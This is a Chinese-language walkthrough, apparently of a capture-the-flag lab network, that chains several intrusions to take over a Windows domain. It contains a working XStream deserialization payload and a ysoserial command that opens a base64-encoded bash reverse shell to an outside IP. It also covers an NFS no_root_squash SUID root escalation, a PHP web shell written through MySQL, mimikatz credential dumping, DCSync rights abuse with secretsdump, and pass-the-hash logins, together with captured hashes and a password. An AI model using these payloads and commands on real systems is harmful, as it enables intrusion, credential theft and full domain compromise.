上来先扔fscan去扫一下
发现开放ftp服务允许匿名登录.
登录发现存在一个pom.xml文件,内容如下
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>
<parent>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-parent</artifactId>
<version>2.7.2</version>
<relativePath/> <!-- lookup parent from repository -->
</parent>
<groupId>com.example</groupId>
<artifactId>ezjava</artifactId>
<version>0.0.1-SNAPSHOT</version>
<name>ezjava</name>
<description>ezjava</description>
<properties>
<java.version>1.8</java.version>
</properties>
<dependencies>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-thymeleaf</artifactId>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-web</artifactId>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-test</artifactId>
<scope>test</scope>
</dependency>
<dependency>
<groupId>com.thoughtworks.xstream</groupId>
<artifactId>xstream</artifactId>
<version>1.4.16</version>
</dependency>
<dependency>
<groupId>commons-collections</groupId>
<artifactId>commons-collections</artifactId>
<version>3.2.1</version>
</dependency>
</dependencies>
<build>
<plugins>
<plugin>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-maven-plugin</artifactId>
</plugin>
</plugins>
</build>
</project>
网上说这里存在xstream的洞(不懂java)
在vps上利用yso去起个服务(打JDBC的时候似乎也用的他)
java -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjMuNTcuMjMuNDAvMTExMSAwPiYx}|{base64,-d}|{bash,-i}"
然后监听1111,传payload去弹shell.向服务端发包
POST /just_sumbit_it HTTP/1.1
Host: 39.101.139.231:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/xml
Content-Length: 3113
<java.util.PriorityQueue serialization='custom'>
<unserializable-parents/>
<java.util.PriorityQueue>
<default>
<size>2</size>
</default>
<int>3</int>
<javax.naming.ldap.Rdn_-RdnEntry>
<type>12345</type>
<value class='com.sun.org.apache.xpath.internal.objects.XString'>
<m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content</m__obj>
</value>
</javax.naming.ldap.Rdn_-RdnEntry>
<javax.naming.ldap.Rdn_-RdnEntry>
<type>12345</type>
<value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>
<message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>
<parsedMessage>true</parsedMessage>
<soapVersion>SOAP_11</soapVersion>
<bodyParts/>
<sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
<attachmentsInitialized>false</attachmentsInitialized>
<nullIter class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>
<aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'>
<candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'>
<names>
<string>aa</string>
<string>aa</string>
</names>
<ctx>
<environment/>
<registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'>
<java.rmi.server.RemoteObject>
<string>UnicastRef</string>
<string>123.57.23.40</string>
<int>1099</int>
<long>0</long>
<int>0</int>
<long>0</long>
<short>0</short>
<boolean>false</boolean>
</java.rmi.server.RemoteObject>
</registry>
<host>123.57.23.40</host>
<port>1099</port>
</ctx>
</candidates>
</aliases>
</nullIter>
</sm>
</message>
</value>
</javax.naming.ldap.Rdn_-RdnEntry>
</java.util.PriorityQueue>
</java.util.PriorityQueue>
成功弹shell,还是root权限.
成功拿到第一个flag
flag:flag{24cee65c-a610-4011-9a1b-188243e52189}
挂个横向代理,传个fscan去扫内网
总算搞懂了,这个fscan必须有root权限才能发icmp包,扫的才快...
./fscan -h 172.22.13.14/24
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
(icmp) Target 172.22.13.14 is alive
(icmp) Target 172.22.13.6 is alive
(icmp) Target 172.22.13.28 is alive
(icmp) Target 172.22.13.57 is alive
[*] Icmp alive hosts len is: 4
172.22.13.28:80 open
172.22.13.57:80 open
172.22.13.57:22 open
172.22.13.14:80 open
172.22.13.14:22 open
172.22.13.14:21 open
172.22.13.28:135 open
172.22.13.6:135 open
172.22.13.14:8080 open
172.22.13.28:8000 open
172.22.13.28:3306 open
172.22.13.6:88 open
172.22.13.28:445 open
172.22.13.6:445 open
172.22.13.28:139 open
172.22.13.6:139 open
[*] alive ports len is: 16
start vulscan
[*] WebTitle http://172.22.13.14 code:200 len:10918 title:Apache2 Ubuntu Default Page: It works
[+] ftp 172.22.13.14:21:anonymous
[->]1.txt
[->]pom.xml
[*] NetInfo
[*]172.22.13.28
[->]WIN-HAUWOLAO
[->]172.22.13.28
[*] WebTitle http://172.22.13.28 code:200 len:2525 title:欢迎登录OA办公平台
[*] WebTitle http://172.22.13.57 code:200 len:4833 title:Welcome to CentOS
[*] NetInfo
[*]172.22.13.6
[->]WIN-DC
[->]172.22.13.6
[*] NetBios 172.22.13.28 WIN-HAUWOLAO.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] NetBios 172.22.13.6 [+] DC:XIAORANG\WIN-DC
[*] WebTitle http://172.22.13.14:8080 code:200 len:3655 title:公司发货单
[*] WebTitle http://172.22.13.28:8000 code:200 len:170 title:Nothing Here.
[+] mysql 172.22.13.28:3306:root 123456
已完成 16/16
[*] 扫描结束,耗时: 17.592431045s
一共有如下四个机器
172.22.13.6 : WIN-DC
172.22.13.14: 当前
172.22.13.28 WIN-HAUWOLAO
172.22.13.57
根据提示,还有个nfs.我们扫一下2049
这就看明白了,这个172.22.13.57基本是nfs
查看匿名nfs文件列表
proxychains showmount -e 172.22.13.57
然而试图挂载到kali下,总是不成功(kali不在内网,当然挂不上去).靶机上没有nfs-common,还没办法直接apt install
按照如下操作去执行命令在入口机安装nfs-common
wget http://archive.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-common_1.3.4-2.5ubuntu3_amd64.deb
wget http://archive.ubuntu.com/ubuntu/pool/main/libn/libnfsidmap/libnfsidmap2_0.25-5.1ubuntu1_amd64.deb
wget http://archive.ubuntu.com/ubuntu/pool/main/libt/libtirpc/libtirpc3_1.2.5-1_amd64.deb
wget http://archive.ubuntu.com/ubuntu/pool/main/r/rpcbind/rpcbind_1.2.5-8_amd64.deb
wget http://archive.ubuntu.com/ubuntu/pool/main/k/keyutils/keyutils_1.6-6ubuntu1_amd64.deb
wget http://archive.ubuntu.com/ubuntu/pool/main/libt/libtirpc/libtirpc-common_1.2.5-1_all.deb
dpkg -i libnfsidmap2_0.25-5.1ubuntu1_amd64.deb && \
dpkg -i libtirpc-common_1.2.5-1_all.deb && \
dpkg -i libtirpc3_1.2.5-1_amd64.deb && \
dpkg -i rpcbind_1.2.5-8_amd64.deb && \
dpkg -i keyutils_1.6-6ubuntu1_amd64.deb && \
dpkg -i nfs-common_1.3.4-2.5ubuntu3_amd64.deb
进行挂载
mount -t nfs 172.22.13.57:/home/joyce /mnt
df -h发现成功挂载
我们查看这个mnt的所有者的uid和gid
在本地创建一个uid和gid相同的用户,即可伪造身份进行远程登录
先创个994的组,然后添加用户
groupadd -g 994 joycegroup
useradd -u 996 -g 994 joyce
写个ssh公钥进去远程登录
首先切换到joyce用户,然后提升一下shell
su joyce
python3 -c 'import pty;pty.spawn("/bin/bash")'
然后来到tmp文件夹(为数不多能写的文件夹)
创个密钥对
ssh-keygen
然后把公钥写入/mnt/.ssh/authorized_keys中
cat id_rsa.pub >> /mnt/.ssh/authorized_keys
连接
ssh -i id_rsa [email protected]
成功登录,但是没权限读flag.找找suid提权
find / -user root -perm -4000 -print 2>/dev/null
这ftp看着有说法.但是运行后输入!/bin/bash还是普通的shell而不是root shell.
查看一下exports配置
cat /etc/exports
发现配置了no_root_squash.一般的nfs会对远程登录的root账户进行降级(降为最小).而开启了no_root_squash的则不会降级.
我们回到入口机的root账号去做一个root shell
echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > root.c
gcc root.c -o root
chmod +s root
然后回到joyce,直接运行即可提权.
得到了flag:flag{03122425-c1a2-4813-894e-5f2e669779f7}
172.22.13.28是个mysql弱口令,直接代理nvcat上去.
看一下secure_file_priv
show variables like "secure_file_priv";
空的,可以写文件.看一下全局变量
show variables like "%general%";
是phpstudy的,果断写马
select "<?php eval($_POST[1]);?>" into outfile "C:/phpstudy_pro/WWW/1.php";
直接蚁剑连.phpstudy的权限很高,上去直接就是system权限.
flag:flag{32e6dcd0-0ed6-4ba5-a52f-410e10f5358c}
填个用户rdp上去
net user lbz lbz12345! /add
net localgroup administrators lbz /add
传个Bloodhound上去跑(只有system权限成功了,不懂)
我们看到这个CHENLEI这个用户是真nb,属于ACL ADMIN组,能对DC有GenericWrite权限和WriteDacl权限.也就是说,他能任意写Dcsync.
传个mimikatz去进行一下域信息搜集
sekurlsa::logonpasswords
得到了chenglei的passwordXt61f3LBhg1和NTLM0c00801c30594a1b8eaa889d237c5382
以及system的NTLMb0987f611bd26671ccec2482bc23cd5a
使用dacledit.py给chenglei去添加DCSync权限.
proxychains python3 dacledit.py xiaorang.lab/chenglei -hashes :0c00801c30594a1b8eaa889d237c5382 -action write -rights DCSync -principal chenglei -target-dn "DC=xiaorang,DC=lab" -dc-ip 172.22.13.6
用secretdump去抓哈希
proxychains python3 secretsdump.py xiaorang.lab/[email protected] -hashes :0c00801c30594a1b8eaa889d237c5382 -just-dc-ntlm
得到了Administractor的NTLM:6341235defdaed66fb7b682665752c9a
哈希横传进行登录
proxychains python3 psexec.py -hashes :6341235defdaed66fb7b682665752c9a XIAORANG/[email protected]
成功得到了第四个flag
flag:flag{27f119fa-b5f3-440c-affb-f1fe5272706f}
共用时3小时50分钟,其中大部分时间都卡在了第二个flag,公钥打死写不进去.后来看到了添加joyce用户的操作才明白.写ACL添加DCSync权限不是什么生疏的操作了,Exchange时也打过.比较奇怪的是,这个Sharphound必须要system权限才能搜集.之前印象中普通的域用户都能运行的.
